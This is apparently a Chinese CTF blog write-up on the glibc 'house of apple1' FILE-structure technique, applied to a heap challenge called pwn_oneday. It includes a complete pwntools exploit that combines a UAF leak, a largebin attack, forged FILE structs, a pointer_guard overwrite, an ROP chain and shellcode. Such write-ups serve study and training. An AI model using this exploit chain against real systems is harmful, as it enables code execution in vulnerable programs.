<\/span><\/h4>\n\n\n\n\u7ed3\u5408emma\u6240\u5199\uff0c\u57282.24\u4e4b\u540evtable\u6709\u68c0\u67e5\uff0c\u6240\u4ee5\u4f2a\u9020\u7ed3\u6784\u4f53\u65f6\u53ea\u80fd\u8ba9vtable\u6307\u5411\u7279\u5b9a\u8303\u56f4\uff0c\u800c\u5229\u7528\u539f\u7406\u4ecd\u7136\u662f\u5728\u8c03\u7528fflush\u51fd\u6570\u5237\u65b0\u6240\u6709\u6587\u4ef6\u7684\u65f6\u5019\uff0c\u901a\u8fc7\u8be5\u5199vtable\uff0c\u8c03\u7528\u539f\u672coverflow\u4f4d\u7f6e\u7684\u51fd\u6570\uff0c\u5728house of apple1\u4e2d\uff0c\u6211\u4eec\u9009\u62e9\u7684\u662f\u628avtable\u6539\u5199\u6210_IO_wstrn_jumps\u8fd9\u4e2a\u8df3\u8f6c\u8868\uff0c\u8c03\u7528\u7684\u51fd\u6570\u662f_IO_wstrn_overflow\uff0c\u800c\u8fd9\u4e2a\u51fd\u6570\u7684\u4f5c\u7528\u5bf9\u8c61\u662f_IO_wide_data\uff0c\u56e0\u6b64\u6211\u4eec\u6765\u8ba8\u8bba\u4e00\u4e0b_IO_wide_data\u8fd9\u4e2a\u7ed3\u6784\u4f53<\/p>\n\n\n\n
\u9996\u5148\uff0c\u572864\u4f4d\u7a0b\u5e8f\u4e0b\uff0c\u5b83\u7684\u6307\u9488\u5b58\u653e\u5728file\u7ed3\u6784\u4f530xa0\u7684\u504f\u79fb\u4e0b<\/p>\n\n\n\n
amd64\uff1a\n0x0:'_flags',\n0x8:'_IO_read_ptr',\n0x10:'_IO_read_end',\n0x18:'_IO_read_base',\n0x20:'_IO_write_base',\n0x28:'_IO_write_ptr',\n0x30:'_IO_write_end',\n0x38:'_IO_buf_base',\n0x40:'_IO_buf_end',\n0x48:'_IO_save_base',\n0x50:'_IO_backup_base',\n0x58:'_IO_save_end',\n0x60:'_markers',\n0x68:'_chain',\n0x70:'_fileno',\n0x74:'_flags2',\n0x78:'_old_offset',\n0x80:'_cur_column',\n0x82:'_vtable_offset',\n0x83:'_shortbuf',\n0x88:'_lock',\n0x90:'_offset',\n0x98:'_codecvt',\n0xa0:'_wide_data',\n0xa8:'_freeres_list',\n0xb0:'_freeres_buf',\n0xb8:'__pad5',\n0xc0:'_mode',\n0xc4:'_unused2',\n0xd8:'vtable'<\/code><\/pre>\n\n\n\n\u800c_IO_wide_data\u7ed3\u6784\u4f53\u957f\u8fd9\u4e2a\u6837\u5b50\uff0c\u8be5\u6307\u9488\u6307\u5411\u7684\u4f4d\u7f6e\u4e5f\u4f1a\u88ab\u89e3\u6790\u6210_IO_wide_data\u7ed3\u6784\u4f53<\/p>\n\n\n\n
struct _IO_wide_data\n{\n wchar_t *_IO_read_ptr; \/* Current read pointer *\/\n wchar_t *_IO_read_end; \/* End of get area. *\/\n wchar_t *_IO_read_base; \/* Start of putback+get area. *\/\n wchar_t *_IO_write_base; \/* Start of put area. *\/\n wchar_t *_IO_write_ptr; \/* Current put pointer. *\/\n wchar_t *_IO_write_end; \/* End of put area. *\/\n wchar_t *_IO_buf_base; \/* Start of reserve area. *\/\n wchar_t *_IO_buf_end; \/* End of reserve area. *\/\n \/* The following fields are used to support backing up and undo. *\/\n wchar_t *_IO_save_base; \/* Pointer to start of non-current get area. *\/\n wchar_t *_IO_backup_base; \/* Pointer to first valid character of\n backup area *\/\n wchar_t *_IO_save_end; \/* Pointer to end of non-current get area. *\/\n \n __mbstate_t _IO_state;\n __mbstate_t _IO_last_state;\n struct _IO_codecvt _codecvt;\n wchar_t _shortbuf[1];\n const struct _IO_jump_t *_wide_vtable;\n};<\/code><\/pre>\n\n\n\n\u63a5\u4e0b\u6765\uff0c\u5728\u6211\u4eec\u8c03\u7528_IO_wstrn_overflow\u51fd\u6570\u65f6\uff0c\u4f1a\u6267\u884c\u5982\u4e0b\u64cd\u4f5c\uff0c\u6211\u4eec\u7ed3\u5408\u6e90\u7801\u6765\u5206\u6790<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
1.\u5f3a\u5236\u5c06fp\u8f6c\u5316\u4e3a\u4e00\u4e2a_IO_wstrnfile\u6307\u9488\uff0c\u5e76\u5c06\u5176\u8d4b\u503c\u7ed9snf<\/p>\n\n\n\n
\u597d\uff0c\u90a3\u4e48_IO_wstrnfile\u957f\u4ec0\u4e48\u6837\u5b50\u5462\uff1f<\/p>\n\n\n\n
struct _IO_str_fields\n{\n _IO_alloc_type _allocate_buffer_unused;\n _IO_free_type _free_buffer_unused;\n};\n \nstruct _IO_streambuf\n{\n FILE _f;\n const struct _IO_jump_t *vtable;\n};\n \ntypedef struct _IO_strfile_\n{\n struct _IO_streambuf _sbf;\n struct _IO_str_fields _s;\n} _IO_strfile;\n \ntypedef struct\n{\n _IO_strfile f;\n \/* This is used for the characters which do not fit in the buffer\n provided by the user. *\/\n char overflow_buf[64];\n} _IO_strnfile;\n \n \ntypedef struct\n{\n _IO_strfile f;\n \/* This is used for the characters which do not fit in the buffer\n provided by the user. *\/\n wchar_t overflow_buf[64]; \/\/ overflow_buf\u5728\u8fd9\u91cc********\n} _IO_wstrnfile;<\/code><\/pre>\n\n\n\n\u770b\u8d77\u6765\u5f88\u590d\u6742\uff0c\u6240\u4ee5\u6211\u753b\u4e86\u4e2a\u56fe\u7b80\u5316\u4e86\u4e00\u4e0b<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
2.\u5224\u65adfp->_wide_data->_IO_buf_base != snf->overflow_buf<\/code>\u662f\u5426\u6210\u7acb\uff0c\u901a\u5e38\u8fd9\u4e2a\u68c0\u67e5\u662f\u6210\u7acb\u7684\uff0c\u57fa\u672c\u4e0d\u7528\u8003\u8651\u7ed5\u8fc7<\/p>\n\n\n\n3.\u5c06\u4e00\u7cfb\u5217\u7684\u6307\u9488\u8d4b\u503c\u4e3asnf->overflow_buf\uff0c\u8fd9\u4e9b\u6307\u9488\u7ecf\u8fc7\u603b\u7ed3\uff0c\u5c31\u662fwide_data\u6bb5\u4ece0\u52300x40\u8303\u56f4\u5185\u7684\u6570\u636e\u90fd\u4f1a\u88ab\u66ff\u6362<\/p>\n\n\n\n
\u7531\u6b64\u5982\u679c\u6211\u4eec\u8bbe\u8ba1\u597dwide_data\u6307\u9488\u7684\u503c\uff0c\u5e76\u4e14\u6210\u529f\u4fee\u6539vtable\u4e3a_IO_wstrn_jumps\uff0c\u5373\u53ef\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u5199\uff0c\u753b\u4e2a\u56fe\u5982\u4e0b\uff0c\u52a0\u5165\u6211\u4eec\u76f4\u5230\u67d0\u5806\u5757\u5730\u5740\u4e3aA\uff0c\u5e76\u5728\u6b64\u5806\u5757\u91cc\u8fdb\u884c\u4e86IO_file\u7ed3\u6784\u4f53\u7684\u4f2a\u9020\uff0c\u5728wide_data\u6bb5\u5199\u4e00\u4e2a\u4f60\u60f3\u4efb\u610f\u5199\u7684\u5730\u5740B\uff0c\u90a3\u4e48\u5728\u6267\u884c\u5230\u6b64\u5904\u8fdb\u884c\u5237\u65b0\u65f6\uff0c\u7531\u4e8evtable\u5df2\u7ecf\u88ab\u6539\u5199\uff0c\u56e0\u6b64\u4f1a\u8c03\u7528_IO_wstrn_overflow(fp)\uff0c\u4ece\u800c\u5c06B\u5230B+0x40\u7684\u4f4d\u7f6e\u5168\u90e8\u6539\u5199\u4e3aA+0xf0\uff08\u9664\u4e86_IO_read_end\u548c_IO_buf_end\u4f1a\u88ab\u6539\u5199\u6210A+0x1f0\uff09\u81f3\u6b64\uff0capple1\u7684\u653b\u51fb\u6d41\u7a0b\u7ed3\u675f\uff0c\u7531\u6b64\u53ef\u89c1\uff0c\u5728\u6ca1\u6709hook\u51fd\u6570\u7684\u60c5\u51b5\u4e0b\uff0capple1\u5b9e\u73b0\u7684\u4efb\u610f\u5199\u5e76\u4e0d\u80fd\u8d77\u5230\u76f4\u63a5\u7684\u653b\u51fb\u4f5c\u7528\uff0c\u6240\u4ee5\u901a\u5e38\u8981\u7ed3\u5408\u5176\u4ed6\u624b\u6cd5\u5171\u540c\u5b8c\u6210\u540e\u7eed\u7684\u653b\u51fb<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/span>\u4f8b\u9898\u8bb2\u89e3<\/span><\/h4>\n\n\n\n\u4e0b\u9762\u4ee5roderick01\u5927\u795e\u6240\u7ed9\u51fa\u7684\u4f8b\u9898pwn_oneday\u4e3a\u672cblog\u4f8b\u9898\uff0c\u8fdb\u884c\u8be6\u7ec6\u7684exp\u5206\u6790<\/p>\n\n\n\n
\u9898\u76ee\u5206\u6790<\/h5>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u7ecf\u5178\u7684\u589e\u5220\u6539\u67e5\u5806\u9898\uff0c\u5176\u4e2d\u6539\uff0c\u67e5\u53ea\u6709\u4e00\u6b21\uff0c\u5f00\u4e86\u6c99\u7bb1\uff0c\u7981\u6389\u4e86execve<\/p>\n\n\n\n
\u9996\u5148\u8f93\u5165\u4e00\u4e2akey\uff0ckey*0x110\u8bb0\u4e3asize\uff0c\u5b58\u5230bss\u6bb5\u4e0a\uff0cadd\u65f6\u53ea\u80fd\u9009\u62e9\u4e09\u79cd\u5927\u5c0f\uff0c\u5373size\uff0csize+0x10,2*size\uff0c\u5206\u522b\u5bf9\u5e94\u9009\u62e91,2,3<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u5220\u7684\u65f6\u5019\u6307\u9488\u8868\u6ca1\u7f6e\u96f6\uff0c\u5b58\u5728UAF<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u6539\u548c\u67e5\u4e2d\u89c4\u4e2d\u77e9<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
\u601d\u8def\u5206\u6790<\/h5>\n\n\n\n \u9996\u5148\u8981\u60f3\u529e\u6cd5\u6cc4\u9732\u51faheapbase\u548clibcbase\uff0c\u6709\u4e86libcbase\u5c31\u77e5\u9053\u4e86_IO_list_all\u548cpoint_chk_guard\u7684\u4f4d\u7f6e\u4e86\uff0c\u6709\u4e86heapbase\u5c31\u77e5\u9053fakefile\u7684\u4f4d\u7f6e\u4e86\u3002<\/p>\n\n\n\n
\u6574\u4f53\u5229\u7528\u601d\u8def\u662f\uff1a\u9996\u5148\u5229\u7528largebin attack\u4fee\u6539_IO_list_all\u4e3aheapaddr\uff08\u4e0d\u662fheapbase\uff09\uff0c\u63a5\u7740\u5728heapaddr\u7684\u5730\u65b9\u653e\u597d\u4f2a\u9020\u7684fakefile\uff0cfile1\u7528\u6765\u8c03\u7528_IO_wstrn_overflow\u89e6\u53d1apple1\u4efb\u610f\u5199\uff0c\u628apoint_chk_guard\u4fee\u6539\u6210\u5806\u5730\u5740\u4f7f\u5176\u53d8\u6210\u4e00\u4e2a\u5df2\u77e5\u91cf\uff0cfile2\u7528\u6765\u89e6\u53d1house of emma\u8fdb\u884crsp\u7684\u52ab\u6301\uff0c\u5728\u7a0b\u5e8freturn 0\u6216exit\u7684\u65f6\u5019\u8c03\u7528fflush\uff08stderr\uff09\u4ece\u800c\u6267\u884c\u4e0a\u8ff0\u7684\u6d41\u7a0b<\/p>\n\n\n\n
exp\u8be6\u89e3<\/h5>\n\n\n\n \u9996\u5148\u660e\u786e\u5728\u8fd9\u91cc\u6211\u4eec\u9009\u62e9\u7684key\u7684\u5927\u5c0f\u4e3a10\uff0c\u5bf9\u5e94\u7684size\u5927\u5c0f\u4e3a0xaa0\uff0c\u5219\u6700\u7ec8\u5728\u5806\u5757\u7684size\u4f4d\u6709\u53ef\u80fd\u662f0xab1,0xac1,0x1551\uff0c\u5206\u522b\u5bf9\u5e94\u4e86\u9009\u62e91,2,3<\/p>\n\n\n\n
from pwn import *\nfrom pwncli import *\nio = process(\".\/oneday\")\nlibc = ELF(\".\/libc.so.6\")\ncontext.arch = 'amd64'\ncontext.log_level = 'debug'\ndef add(choice):\n io.recvuntil(b'enter your command: \\n')\n io.sendline(b'1')\n io.recvuntil(b'choise: ')\n io.sendline(str(choice).encode())\n\ndef delete(idx):\n io.recvuntil(b'enter your command: \\n')\n io.sendline(b'2')\n io.recvuntil(b'Index: \\n')\n io.sendline(str(idx).encode())\n\ndef edit(idx, message):\n io.recvuntil(b'enter your command: \\n')\n io.sendline(b'3')\n io.recvuntil(b'Index: ')\n io.sendline(str(idx))\n io.recvuntil(b'Message: \\n')\n io.send(message)\n\ndef show(idx):\n io.recvuntil(b'enter your command: \\n')\n io.sendline(b'4')\n io.recvuntil(b'Index: ')\n io.sendline(str(idx).encode())\n\ndef exit():\n io.recvuntil(b'enter your command: \\n')\n io.sendline(b'9')\n\nio.sendlineafter(b'enter your key >>\\n', str(10).encode())\nadd(2)#0\nadd(2)#1\nadd(1)#2\ndelete(2)\ndelete(1)\ndelete(0)\nadd(1)#3\nadd(1)#4\nadd(1)#5\nadd(1)#6\ndelete(3)\ndelete(5)\nshow(3)\nlibc_base = u64(io.recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00')) - 0x1f2cc0\nio.recv(2)\nheap_base = u64(io.recv(6).ljust(8, b'\\x00')) - 0x17f0\ndelete(4)\ndelete(6)\nadd(3)#7\nadd(1)#8\nadd(1)#9\ndelete(8)\nadd(3)#10\n\ntarget_addr = libc_base + libc.sym['_IO_list_all']\n_IO_wstrn_jumps = libc_base + 0x1f3d20\n_IO_cookie_jumps = libc_base + 0x1f3ae0\n_lock = libc_base + 0x1f5720\npoint_guard_addr = _IO_wstrn_jumps+0xf910\nexpected = heap_base + 0x1900\nchain = heap_base + 0x1910\nmagic_gadget = libc_base + 0x146020\nprint('target_addr:',hex(target_addr))\nprint('expected:',hex(expected))\nprint('chain:',hex(chain))\nprint('magic_gadget:',hex(magic_gadget))\nprint('point_guard_addr:',hex(point_guard_addr))\nprint('_IO_wstrn_jumps:',hex(_IO_wstrn_jumps))\nprint('_IO_cookie_jumps:',hex(_IO_cookie_jumps))\nprint('_lock:',hex(_lock))\n\n\nmov_rsp_rdx_ret = libc_base + 0x56530\nadd_rsp_0x20_pop_rbx_ret = libc_base + 0xfd449\npop_rdi_ret = libc_base + 0x2daa2\npop_rsi_ret = libc_base + 0x37c0a\npop_rdx_rbx_ret = libc_base + 0x87729\n\nf1 = IO_FILE_plus_struct()\nf1._IO_read_ptr = 0xa81\nf1.chain = chain\n# f1._flags2 = 8\nf1._lock = _lock\nf1._mode = 0\nf1._wide_data = point_guard_addr\nf1.vtable = _IO_wstrn_jumps\n\nf2 = IO_FILE_plus_struct()\nf2._IO_write_base = 0\nf2._IO_write_ptr = 1\nf2._mode = 0\nf2._lock = _lock\n# f2._flags2 = 8\nf2.vtable = _IO_cookie_jumps + 0x58\n\ndata = flat({\n 0x8: target_addr - 0x20,\n 0x10: {\n 0: {\n 0: bytes(f1),\n 0x100:{\n 0: bytes(f2),\n 0xe0: [chain + 0x100, rol(magic_gadget ^ expected, 0x11)],\n 0x100: [\n add_rsp_0x20_pop_rbx_ret,\n chain + 0x100,\n 0,\n 0,\n mov_rsp_rdx_ret,\n 0,\n pop_rdi_ret,\n chain & ~0xfff,\n pop_rsi_ret,\n 0x4000,\n pop_rdx_rbx_ret,\n 7, 0,\n libc_base + libc.sym['mprotect'],\n chain + 0x200\n ],\n 0x200: asm(shellcraft.open('.\/flag', 0) + shellcraft.read(3, heap_base, 0x100) + shellcraft.write(1, heap_base, 0x100))\n }\n },\n 0xa80: [0, 0xab1]\n }\n})\nedit(5, data)\ndelete(2)\nadd(3)\nattach(io)\npause()\nexit()\nio.interactive()<\/code><\/pre>\n\n\n\n\u6211\u4eec\u9010\u884c\u5206\u6790\uff0c\u9996\u5148\u9898\u76eeadd\u4e863\u4e2a\u5806\u5757\uff0c\u53c8\u628a\u4ed6\u4eec\u5220\u6389\u4e86\uff0c\u90a3\u4e48\u53ef\u4ee5\u753b\u51fa\u5982\u4e0b\u7684\u56fe<\/p>\n\n\n\n
add(2)#0\nadd(2)#1\nadd(1)#2\ndelete(2)\ndelete(1)\ndelete(0)<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u540e\u6587\u7686\u7528\u201c*\u201d\u6765\u8868\u793a\u6307\u9488\u8868\u91cc\u6709\u8fd9\u4e2a\u6307\u9488<\/p>\n\n\n\n
\u63a5\u7740\u5168\u5220\u9664\u4e4b\u540e\uff0c\u7531\u4e8e\u5927\u5c0f\u90fd\u653e\u5728unsortedbin\u91cc\uff0c\u800cunsortedbin\u53c8\u4f1a\u548ctop chunk\u5408\u5e76\uff0c\u6240\u4ee5\u5806\u5757\u4f1a\u56de\u5230\u521d\u59cb\u72b6\u6001\uff0c\u5373\u4ec0\u4e48\u4e5f\u6ca1\u6709<\/p>\n\n\n\n
\u63a5\u4e0b\u6765<\/p>\n\n\n\n
add(1)#3\nadd(1)#4\nadd(1)#5\nadd(1)#6\ndelete(3)\ndelete(5)\nshow(3)\nlibc_base = u64(io.recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00')) - 0x1f2cc0\nio.recv(2)\nheap_base = u64(io.recv(6).ljust(8, b'\\x00')) - 0x17f0\ndelete(4)\ndelete(6)<\/code><\/pre>\n\n\n\n\u6211\u4eec\u53ef\u4ee5\u7ee7\u7eed\u753b\u56fe<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u8fd9\u91cc\u8981\u6ce8\u610f\u548c\u7b2c\u4e00\u6b21\u7684\u4e09\u4e2aadd\u4e0a\u5927\u5c0f\u4e4b\u95f4\u7565\u6709\u5dee\u522b\uff0c\u5220\u63893,5\u540e\uff0c\u4e24\u4e2a\u5806\u5757\u4f1a\u88ab\u5206\u522b\u653e\u5165unsortedbin\u91cc\uff0c\u7531\u4e8e4\u7684\u95f4\u9694\uff0c\u4e8c\u8005\u4e0d\u4f1a\u5408\u5e76\uff0c\u4ece\u800c\u5176fd\uff0cbk\u5206\u522b\u6307\u5411\u4e86libc\u5730\u5740\u548c\u5806\u5730\u5740<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
show\uff083\uff09\u4e00\u4e0b\uff0c\u5373\u53ef\u5229\u7528\u552f\u4e00\u7684\u4e00\u6b21show\u673a\u4f1a\u540c\u65f6\u6cc4\u6f0f\u51falibc\u548cheap<\/p>\n\n\n\n
show\u5b8c\u4e86\u5220\u63894,6\uff0c\u7531\u4e8e\u5408\u5e76\u7684\u539f\u56e0\uff0c\u5806\u5757\u53c8\u4f1a\u56de\u5230\u521d\u59cb\u72b6\u6001<\/p>\n\n\n\n
\u63a5\u4e0b\u6765<\/p>\n\n\n\n
add(3)#7\nadd(1)#8\nadd(1)#9\ndelete(8)\nadd(3)#10\n#data\u7684\u5177\u4f53\u5185\u5bb9\u7a0d\u540e\u5206\u6790\nedit(5, data)\ndelete(2)\nadd(3)<\/code><\/pre>\n\n\n\n\u7ed8\u5236\u4e00\u4e0b\u5982\u56fe\uff0c\u91cd\u70b9\u5173\u6ce8\u4e24\u4e2a\u6807\u7ea2\u7684\u5806\u5757<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
delete\uff088\uff09\u7136\u540e\u518dadd\uff083\uff09\u662f\u4e3a\u4e86\u9996\u5148\u5c06\u5806\u57578\u653e\u5165unsortedbin\u91cc\uff0c\u7136\u540e\u7533\u8bf7\u4e00\u4e2a\u6bd4\u4ed6\u5927\u7684\u5806\u5757\uff0c\u8ba9\u5806\u57578\u653e\u5165largebin\u91cc\uff0c\u63a5\u7740\uff0c\u6211\u7f16\u8f91\u5806\u57575\uff0c\u8be5\u5199\u5176bk_nextsize\u540c\u65f6\u5728\u539f\u5148\u5806\u57572\u7684\u4f4d\u7f6e\u4f2a\u9020\u4e00\u4e2a\u5806\u5757\uff08\u56e0\u4e3a\u5806\u57572\u5148\u524d\u5df2\u7ecf\u91ca\u653e\u8fc7\u4e86\uff0c\u4e0d\u52a0\u4f2a\u9020\u76f4\u63a5\u91ca\u653e\u7684\u8bdd\u4f1a\u62a5\u9519\uff09\uff0c\u628a\u4ed6\u7684size\u4f4d\u8bbe\u7f6e\u62100xa81,\uff08\u56e0\u4e3a\u5806\u57578\u7684size\u4e3a0xab1\uff0c\u90a3\u4e48\u5728\u5806\u57572\u7684\u4f4d\u7f6e\u7406\u5e94\u662f0xab1-0x30=0xa81\uff0c\u540c\u65f60xab1\u548c0xa81\u4e5f\u5728largebin\u7684\u540c\u4e00\u6761\u94fe\u4e2d\uff0c\u6ee1\u8db3largebin attack\u7684\u89e6\u53d1\u6761\u4ef6\uff09\uff0c\u5728\u7f16\u8f91\u5b8c\u5806\u57575\u540e\uff0c\u5806\u57578\u7684bk_nextsize\u4f4d\u7f6e\u6307\u5411\u4e86_IO_list_all-0x20\u7684\u4f4d\u7f6e\uff0c\u5806\u57572\u7684size\u4f4d\u4f2a\u9020\u6210\u4e860xa81\uff0c\u63a5\u7740delete\uff082\uff09\uff0c\u628a\u5806\u57572\u653e\u5165unsortedbin\u91cc\uff0c\u5728add\uff083\uff09\uff0c\u8ba9\u5806\u57572\u8fdb\u5165largebin\u7684\u540c\u65f6\u5b8c\u6210largebin attack\u3002\u6b64\u65f6_IO_list_all\u88ab\u5199\u5165\u5806\u57572\u7684\u5730\u5740\uff0c\u540c\u65f6\u5728\u7f16\u8f91\u5806\u57575\u7684\u65f6\u5019\u5df2\u7ecf\u5c06\u4f2a\u9020\u7684IO\u7ed3\u6784\u4f53\u540c\u6b65\u5199\u597d\u4e86\u3002<\/p>\n\n\n\n
\u90a3\u4e48\u4e3a\u4ec0\u4e48\u8981\u8fd9\u6837\u5927\u8d39\u5468\u7ae0\u7684\u53bb\u4f2a\u9020\u5806\u5757\u5462\uff1f\u76f4\u63a5\u5728\u4e0b\u9762\u7533\u8bf7\u4e2a\u65b0\u7684\u5806\u5757\u4e0d\u4e5f\u80fd\u5b9e\u73b0largebin attack\u5417\uff1f\u539f\u56e0\u5c31\u662f\u4f60\u53ea\u6709\u4e00\u6b21edit\u7684\u673a\u4f1a\uff0c\u4f60\u5fc5\u987b\u8981\u4fdd\u8bc1\u5728largebin attack\u540e_IO_list_all\u6307\u5411\u7684\u5806\u5730\u5740\u91cc\u9762\u662f\u4f60\u4f2a\u9020\u7684IO\u7ed3\u6784\u4f53\uff0c\u7136\u800c\u5728\u8fd9\u4e2a\u9898\u4e2d\uff0c\u5982\u679c\u4e0d\u8fdb\u884c\u4f2a\u9020\uff0c\u5047\u8bbe\u6709AB\u4e24\u5806\u5757\u987a\u6b21\u6392\u5217\uff0c\u6b64\u65f6A\u5df2\u7ecf\u5728largebin\u91cc\uff0c\u90a3\u4e48\u4f60\u5982\u679c\u4fee\u6539A\u7684bk_nextsize\u6307\u9488\uff0c\u7136\u540e\u91ca\u653eB\u89e6\u53d1largebin attack\uff0c\u90a3\u4f60_IO_list_all\u6307\u9488\u6307\u5411\u7684\u662fB\uff0c\u800cB\u91cc\u662f\u7a7a\u7684\u6ca1\u6709\u4e1c\u897f\uff0c\u4f60\u4e5f\u6ca1\u673a\u4f1a\u5728\u4fee\u6539\u4e86\uff0c\u5982\u679c\u4f60\u4fee\u6539\u7684\u662fB\uff0c\u90a3\u4e48\u4f60\u6ca1\u6cd5\u5b8c\u6210largebin attack\uff0c\u6240\u4ee5\u8981\u60f3\u529e\u6cd5\u80fd\u591f\u540c\u65f6\u4fee\u6539bk_nextsize\u6307\u9488\uff0c\u53c8\u8ba9_IO_list_all\u6307\u5411\u4e00\u4e2a\u6211\u53ef\u4ee5\u63a7\u5236\u5185\u5bb9\uff0c\u6216\u8005\u6211\u5df2\u7ecf\u6784\u9020\u597d\u5185\u5bb9\u7684\u5730\u5740\uff0c\u4e8e\u662f\u624d\u8981\u4f2a\u9020\u5806\u5757\u3002<\/p>\n\n\n\n
\u5728\u8fd9\u91cc\u987a\u5634\u63d0\u4e24\u4e2a\u62a5\u9519<\/p>\n\n\n\n
1.\u5982\u679c\u4e0d\u4f2a\u9020\u5806\u57572\u7684size\u4f4d\u76f4\u63a5\u91ca\u653e\u4f1a\u62a5\u9519\u201cfree(): invalid next size (normal)\u201d\uff0c\u9605\u8bfb\u6e90\u7801\u53ef\u4ee5\u53d1\u73b0\u4ee5\u4e0b\u4ee3\u7801<\/p>\n\n\n\n
nextchunk = chunk_at_offset(p, size);\n#define chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s)))\nif (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)\n\t|| __builtin_expect (nextsize >= av->system_mem, 0))\n malloc_printerr (\"free(): invalid next size (normal)\");\n\n#define chunksize_nomask(p) ((p)->mchunk_size)\n# define __builtin_expect(expr, val) (expr)<\/code><\/pre>\n\n\n\n\u8fd9\u51e0\u53e5\u8bdd\u8bf4\u767d\u4e86\u5c31\u662f\u5224\u65ad\u4e0b\u4e00\u4e2a\u5806\u5757nextchunk\u7684size\u5927\u5c0f\u662f\u5426\u5c0f\u4e8eminsize\uff0c\u662f\u5219\u62a5\u9519\uff0c\u800cnextchunk\u53c8\u662f\u6839\u636e\u5f53\u524dchunk+size\u53bb\u5bfb\u627e\uff0c\u7531\u4e8e\u6ca1\u6709\u4f2a\u9020size\uff0c\u6240\u4ee5nextchunk\u7684size\u81ea\u7136\u5c31\u662f\u5f53\u524dchunk\uff0c\u800c\u5f53\u524dchunk\u7684size\u53c8\u4e3a0\uff0c\u6240\u4ee5\u6ca1\u901a\u8fc7\u68c0\u67e5<\/p>\n\n\n\n
2.\u5982\u679c\u4f2a\u9020\u7684\u5806\u5757\u5927\u5c0f\u4e0d\u662f0xa81\uff0c\u800c\u662f0xa91\u62160xa71\u4e4b\u7c7b\u7684\uff0c\u4f1a\u62a5\u9519\u201cdouble free or corruption (!prev)\u201d\uff0c\u9605\u8bfb\u6e90\u7801\u53d1\u73b0\u4ee5\u4e0b\u4ee3\u7801<\/p>\n\n\n\n
if (__glibc_unlikely (!prev_inuse(nextchunk)))\n malloc_printerr (\"double free or corruption (!prev)\");\n#define prev_inuse(p) ((p)->mchunk_size & PREV_INUSE)<\/code><\/pre>\n\n\n\n\u8fd9\u6bb5\u4ee3\u7801\u8bf4\u767d\u4e86\u5c31\u662f\u5728\u5224\u65ad\u4e0b\u4e00\u4e2a\u5806\u5757\u7684size\u6700\u540e\u4e00\u4f4d\u662f\u5426\u4e3a1\uff08\u5373\u5224\u65ad\u4e0a\u4e00\u4e2a\u5806\u5757\u662f\u5426\u88ab\u5360\u7528\uff09\uff0c\u5982\u679c\u662f\u5219\u4e0d\u62a5\u9519\uff0c\u5426\u5219\u62a5\u9519\u3002<\/p>\n\n\n\n
\u63a5\u4e0b\u6765\u6211\u4eec\u6765\u770b\u770b\u5f80\u5806\u57575\u91cc\u5199\u5165\u7684data\u5177\u4f53\u662f\u4ec0\u4e48<\/p>\n\n\n\n
f1 <\/em>= IO_FILE_plus_struct()f1<\/em>._IO_read_ptr = 0xa81#\u6539\u62100x271\u53ef\u4ee5\u901a\u8fc7\u68c0\u67e5\uff0c\u56e0\u4e3a\u76f8\u5e94\u504f\u79fb\u7684\u4f4d\u7f6e\u586b\u4e860x4000chain_lockf1<\/em>._wide_data = point_guard_addr_IO_wstrn_jumpsf2<\/em>._IO_write_base = 0f2<\/em>._IO_write_ptr = 1f2<\/em>._mode = 0f2<\/em>._lock = _lock_IO_cookie_jumps <\/em>+ 0x58\u6211\u4eec\u653e\u5230gdb\u91cc\u76f4\u89c2\u5730\u770b\u4e00\u4e0b<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u5176\u4e2dmagic gadget\u5728\u8fd9\u91cc<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u63a5\u4e0b\u6765\u6211\u4eec\u968f\u7740gdb\u7684\u811a\u6b65\u4e00\u8d77\u6765\u770b\u770b\u7a0b\u5e8f\u8c03\u7528\u8fc7\u7a0b\u4e2d\u53d1\u751f\u4e86\u4ec0\u4e48\uff0c\u65ad\u70b9\u4e0b\u5728add\uff083\uff09\u4ee5\u540e<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u4f2a\u9020\u7684largebin\u7684\u5404\u9879\u6307\u9488\u5df2\u7ecf\u88ab\u4fee\u6539\uff0c\u540c\u65f6_IO_list_all\u5df2\u7ecf\u4fee\u6539\u6210\u5806\u5730\u5740<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u63a5\u7740\u8c03\u7528exit\uff0c\u7a0b\u5e8f\u9000\u51fa\uff0c\u6267\u884cfflush\u51fd\u6570\u5f00\u59cb\u6211\u4eec\u7684\u653b\u51fb<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u7b2c\u4e00\u6b21\u8c03\u7528\u5230_IO_wstrn_overflow\u51fd\u6570\uff0c\u6309\u7167\u6211\u4eec\u7684\u63a8\u6d4b\uff0c\u4f1a\u67098\u4e2a\u503c\u88ab\u4fee\u6539\uff0c\u6ca1\u88ab\u4fee\u6539\u524d\u957f\u8fd9\u6837<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u4fee\u6539\u540e\u957f\u8fd9\u6837<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u786e\u5b9e\u6ee1\u8db3\u6211\u4eec\u7684\u63a8\u6d4b\uff0c\u4fee\u6539\u540e\u7684\u503c\u4e5f\u786e\u5b9e\u5c31\u662fheapaddr+0xf0\u6216heapaddr+0x1f0<\/p>\n\n\n\n
